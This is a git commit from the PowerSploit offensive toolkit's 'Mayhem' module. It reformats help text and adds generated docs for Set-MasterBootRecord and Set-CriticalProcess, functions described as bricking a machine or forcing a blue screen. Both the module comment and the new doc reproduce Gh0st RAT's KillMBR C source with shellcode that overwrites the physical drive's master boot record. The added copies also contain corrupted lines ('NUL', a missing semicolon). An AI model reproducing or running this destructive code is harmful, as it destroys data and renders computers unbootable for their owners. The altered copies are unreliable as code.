For ./Mayhem/ :

-PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs
2016-12-14 18:05:22 -05:00 · 2016-12-14 18:05:22 -05:00 · a81faf36a4
parent 1980f403ee
commit a81faf36a4
4 changed files with 390 additions and 92 deletions
--- a/Mayhem/Mayhem.psm1
+++ b/Mayhem/Mayhem.psm1
@ -3,109 +3,109 @@ function Set-MasterBootRecord
 <#
 .SYNOPSIS

-    Proof of concept code that overwrites the master boot record with the
-    message of your choice.
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord  
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  

-    PowerSploit Function: Set-MasterBootRecord
-    Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
- 
 .DESCRIPTION

-    Set-MasterBootRecord is proof of concept code designed to show that it is
-    possible with PowerShell to overwrite the MBR. This technique was taken
-    from a public malware sample. This script is inteded solely as proof of
-    concept code.
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR. This technique was taken
+from a public malware sample. This script is inteded solely as proof of
+concept code.

 .PARAMETER BootMessage

-    Specifies the message that will be displayed upon making your computer a brick.
+Specifies the message that will be displayed upon making your computer a brick.

 .PARAMETER RebootImmediately

-    Reboot the machine immediately upon overwriting the MBR.
+Reboot the machine immediately upon overwriting the MBR.

 .PARAMETER Force

-    Suppress the warning prompt.
+Suppress the warning prompt.

 .EXAMPLE

-    Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'

 .NOTES

-    Obviously, this will only work if you have a master boot record to
-    overwrite. This won't work if you have a GPT (GUID partition table)
-#>
+Obviously, this will only work if you have a master boot record to
+overwrite. This won't work if you have a GPT (GUID partition table).

-<#
 This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):

-// CGh0stApp message handlers 
- 
-unsigned char scode[] = 
-"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" 
-"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" 
-"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; 
- 
-int CGh0stApp::KillMBR() 
-{ 
-	HANDLE hDevice; 
-	DWORD dwBytesWritten, dwBytesReturned; 
-	BYTE pMBR[512] = {0}; 
-	 
-	// ????MBR 
-	memcpy(pMBR, scode, sizeof(scode) - 1); 
-	pMBR[510] = 0x55; 
-	pMBR[511] = 0xAA; 
-	 
-	hDevice = CreateFile 
-		( 
-		"\\\\.\\PHYSICALDRIVE0", 
-		GENERIC_READ | GENERIC_WRITE, 
-		FILE_SHARE_READ | FILE_SHARE_WRITE, 
-		NULL, 
-		OPEN_EXISTING, 
-		0, 
-		NULL 
-		); 
-	if (hDevice == INVALID_HANDLE_VALUE) 
-		return -1; 
-	DeviceIoControl 
-		( 
-		hDevice,  
-		FSCTL_LOCK_VOLUME,  
-		NULL,  
-		0,  
-		NULL,  
-		0,  
-		&dwBytesReturned,  
-		NULL 
-		); 
-	// ?????? 
-	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); 
-	DeviceIoControl 
-		( 
-		hDevice,  
-		FSCTL_UNLOCK_VOLUME,  
-		NULL,  
-		0,  
-		NULL,  
-		0,  
-		&dwBytesReturned,  
-		NULL 
-		); 
-	CloseHandle(hDevice); 
- 
-	ExitProcess(-1); 
-	return 0; 
-} 
+// CGh0stApp message handlers
+
+unsigned char scode[] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+	HANDLE hDevice;
+	DWORD dwBytesWritten, dwBytesReturned;
+	BYTE pMBR[512] = {0};
+
+	// ????MBR
+	memcpy(pMBR, scode, sizeof(scode) - 1);
+	pMBR[510] = 0x55;
+	pMBR[511] = 0xAA;
+
+	hDevice = CreateFile
+		(
+		"\\\\.\\PHYSICALDRIVE0",
+		GENERIC_READ | GENERIC_WRITE,
+		FILE_SHARE_READ | FILE_SHARE_WRITE,
+		NULL,
+		OPEN_EXISTING,
+		0,
+		NULL
+		);
+	if (hDevice == INVALID_HANDLE_VALUE)
+		return -1;
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_LOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NUL
+		)
+	// ??????
+	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_UNLOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NULL
+		);
+	CloseHandle(hDevice);
+
+	ExitProcess(-1);
+	return 0;
+}
 #>

-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+    Param (
        [ValidateLength(1, 479)]
        [String]
        $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
    $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)

    # Zero-initialize the allocated unmanaged memory
-    0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
+    0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }

    [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)

@ -272,11 +272,11 @@ function Set-CriticalProcess

 Causes your machine to blue screen upon exiting PowerShell.

-PowerSploit Function: Set-CriticalProcess
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Set-CriticalProcess  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None  

 .PARAMETER ExitImmediately

@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose

 #>

-    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
+    Param (
        [Switch]
        $Force,

@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose
    {
        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
    }
-    
+
    if (!$Response)
    {
        return
--- a/docs/Mayhem/Set-CriticalProcess.md
+++ b/docs/Mayhem/Set-CriticalProcess.md
@ -0,0 +1,108 @@
+# Set-CriticalProcess
+
+## SYNOPSIS
+Causes your machine to blue screen upon exiting PowerShell.
+
+PowerSploit Function: Set-CriticalProcess  
+Author: Matthew Graeber (@mattifestation)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-CriticalProcess
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Set-CriticalProcess -ExitImmediately
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Set-CriticalProcess -Force -Verbose
+```
+
+## PARAMETERS
+
+### -Force
+Set the running PowerShell process as critical without asking for confirmation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExitImmediately
+Immediately exit PowerShell after successfully marking the process as critical.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
--- a/docs/Mayhem/Set-MasterBootRecord.md
+++ b/docs/Mayhem/Set-MasterBootRecord.md
@ -0,0 +1,184 @@
+# Set-MasterBootRecord
+
+## SYNOPSIS
+Proof of concept code that overwrites the master boot record with the
+message of your choice.
+
+PowerSploit Function: Set-MasterBootRecord  
+Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)  
+License: BSD 3-Clause  
+Required Dependencies: None  
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
+```
+
+## DESCRIPTION
+Set-MasterBootRecord is proof of concept code designed to show that it is
+possible with PowerShell to overwrite the MBR.
+This technique was taken
+from a public malware sample.
+This script is inteded solely as proof of
+concept code.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
+```
+
+## PARAMETERS
+
+### -BootMessage
+Specifies the message that will be displayed upon making your computer a brick.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: 1
+Default value: Stop-Crying; Get-NewHardDrive
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RebootImmediately
+Reboot the machine immediately upon overwriting the MBR.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Force
+Suppress the warning prompt.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: 
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WhatIf
+Shows what would happen if the cmdlet runs.
+The cmdlet is not run.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: wi
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Confirm
+Prompts you for confirmation before running the cmdlet.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: cf
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+Obviously, this will only work if you have a master boot record to
+overwrite.
+This won't work if you have a GPT (GUID partition table).
+
+This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
+
+// CGh0stApp message handlers
+
+unsigned char scode\[\] =
+"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
+"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
+"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
+
+int CGh0stApp::KillMBR()
+{
+	HANDLE hDevice;
+	DWORD dwBytesWritten, dwBytesReturned;
+	BYTE pMBR\[512\] = {0};
+
+	// ????MBR
+	memcpy(pMBR, scode, sizeof(scode) - 1);
+	pMBR\[510\] = 0x55;
+	pMBR\[511\] = 0xAA;
+
+	hDevice = CreateFile
+		(
+		"\\\\\\\\.\\\\PHYSICALDRIVE0",
+		GENERIC_READ | GENERIC_WRITE,
+		FILE_SHARE_READ | FILE_SHARE_WRITE,
+		NULL,
+		OPEN_EXISTING,
+		0,
+		NULL
+		);
+	if (hDevice == INVALID_HANDLE_VALUE)
+		return -1;
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_LOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NUL
+		)
+	// ??????
+	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
+	DeviceIoControl
+		(
+		hDevice,
+		FSCTL_UNLOCK_VOLUME,
+		NULL,
+		0,
+		NULL,
+		0,
+		&dwBytesReturned,
+		NULL
+		);
+	CloseHandle(hDevice);
+
+	ExitProcess(-1);
+	return 0;
+}
+
+## RELATED LINKS
+
--- a/mkdocs.yml
+++ b/mkdocs.yml
@ -124,7 +124,11 @@ pages:
        - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
 - CodeExecution:
    - Functions:
-        - Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md'
-        - Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md'
-        - Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md'
-        - Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md'
+        - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
+        - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
+        - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
+        - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
+- Mayhem:
+    - Functions:
+        - Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
+        - Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'